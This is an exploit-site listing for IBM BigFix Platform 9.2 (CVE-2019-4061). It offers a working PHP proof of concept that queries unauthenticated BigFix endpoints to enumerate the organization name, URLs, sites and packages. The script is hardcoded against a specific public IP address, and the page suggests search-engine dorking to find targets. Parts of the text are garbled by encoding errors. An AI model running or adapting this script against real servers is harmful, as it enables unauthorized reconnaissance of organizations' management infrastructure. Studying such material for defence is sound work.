Share
## https://sploitus.com/exploit?id=PACKETSTORM:212926
=============================================================================================================================================
    | # Title     : IBM BigFix Platform 9.2 gather information Vulnerability                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://bigfix.com/                                                                                                         |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL. 
       
       (linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),
    	
    [+] save code as poc.php.
    
    [+] Set Target : line  68 
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class IBM_BigFix_Enum
    {
        private $targetUri;
        private $port;
        private $ssl;
    
        public function __construct($targetUri, $port = 52311, $ssl = true)
        {
            $this->targetUri = rtrim($targetUri, '/');
            $this->port = $port;
            $this->ssl = $ssl;
        }
    
        private function sendRequest($uri)
        {
            $url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . ":$this->port" . '/' . ltrim($uri, '/');
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        public function getMasthead()
        {
            $response = $this->sendRequest('masthead/masthead.axfm');
            if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {
                echo "Organization: " . htmlspecialchars($matches[1]) . "\n";
            }
            if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {
                foreach ($matches[1] as $url) {
                    echo "URL: " . htmlspecialchars($url) . "\n";
                }
            }
        }
    
        public function getSites()
        {
            $response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');
            if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {
                echo "Sites:\n";
                foreach ($matches[1] as $site) {
                    echo "- " . htmlspecialchars($site) . "\n";
                }
            }
        }
    
        public function getPackages()
        {
            $response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');
            if (!$response) {
                return;
            }
    
            echo "Packages:\n";
            if (preg_match_all('/url: (.*)/', $response, $matches)) {
                foreach ($matches[1] as $url) {
                    echo "- " . htmlspecialchars($url) . "\n";
                }
            }
        }
    }
    
    // ุชู†ููŠุฐ ุงู„ูƒูˆุฏ
    $bigFix = new IBM_BigFix_Enum('153.143.185.78');
    $bigFix->getMasthead();
    $bigFix->getSites();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================